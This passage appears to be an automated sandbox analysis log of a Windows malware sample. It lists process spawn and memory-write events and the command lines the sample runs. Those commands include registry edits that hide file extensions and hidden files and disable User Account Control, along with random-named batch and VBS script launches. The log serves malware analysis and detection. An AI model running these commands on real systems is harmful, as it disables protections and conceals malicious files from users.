PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2824 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2128 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2128 wrote to memory of 2608 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2608 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2608 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2608 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2608 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2872 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2116 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2116 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2116 wrote to memory of 2052 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe
PID 2872 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 320 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\reg.exe
PID 2872 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2872 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2648 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2648 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2648 wrote to memory of 1640 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

"C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe"

C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe

"C:\Users\Admin\PuoQwQAo\hqEcIcQw.exe"

C:\ProgramData\LOAkMAgs\fAMIYEgY.exe

"C:\ProgramData\LOAkMAgs\fAMIYEgY.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NkkkYksA.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\zosYwkwY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NwIgIscw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\SigIswUE.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\oOwEwYso.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UuAkogwQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iEkgUMUQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BOYQEYsI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vYYIQAsQ.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\HUsAUQsw.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\VyoAQUoc.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\iOYoUMIY.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\cigQccko.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\UQkcQssI.bat" "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e"

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe

C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

